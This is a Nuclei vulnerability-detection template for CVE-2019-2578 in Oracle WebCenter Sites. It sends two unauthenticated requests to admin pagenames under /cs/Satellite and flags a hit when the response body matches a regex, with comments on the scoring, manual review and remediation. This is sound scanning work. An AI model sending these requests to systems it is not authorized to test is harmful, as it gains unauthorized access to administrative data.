# Nuclei detection template for CVE-2019-2578 (Oracle WebCenter Sites).
# It requests two admin pagenames through /cs/Satellite, sending nothing but a
# Host header, and reports a match when the response body fits the regex at
# the bottom of this file.
id: CVE-2019-2578

info:
  name: Broken Access Control Oracle WebCenter Sites
  author: leovalcante
  severity: high
  # Folded scalar: the lines below are joined with single spaces into one
  # string.
  description: >-
    Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion
    Middleware. The supported version that is affected is 12.2.1.3.0.
    Successful attacks of this vulnerability can result in unauthorized
    access to critical data or complete access to all Oracle WebCenter Sites
    accessible data.
  reference: https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
  tags: cve,cve2019,oracle,wcs,auth-bypass
  classification:
    # The vector has I:N and A:N: the scored impact is confidentiality only.
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.60
    cve-id: CVE-2019-2578

requests:
  - raw:
      # Neither request carries a cookie or an Authorization header, so any
      # admin content in the response was served without authentication.
      - |
        GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1
        Host: {{Hostname}}

    # The second page is not requested once the first one has matched.
    stop-at-first-match: true
    matchers:
      # Body-only check with no status-code or header condition beside it, so
      # review a hit manually before reporting it. `[\d\D]*` also spans
      # newlines: the two markers may sit anywhere in the body as long as
      # `<script` comes first.
      # NOTE(review): presumably both markers come from the admin page itself;
      # confirm against a patched instance that they are absent there.
      # Remediation for a confirmed hit: apply the vendor fix for this CVE and
      # keep the Admin pagenames unreachable for unauthenticated clients.
      - type: regex
        part: body
        regex:
          - '<script[\d\D]*<throwexception/>'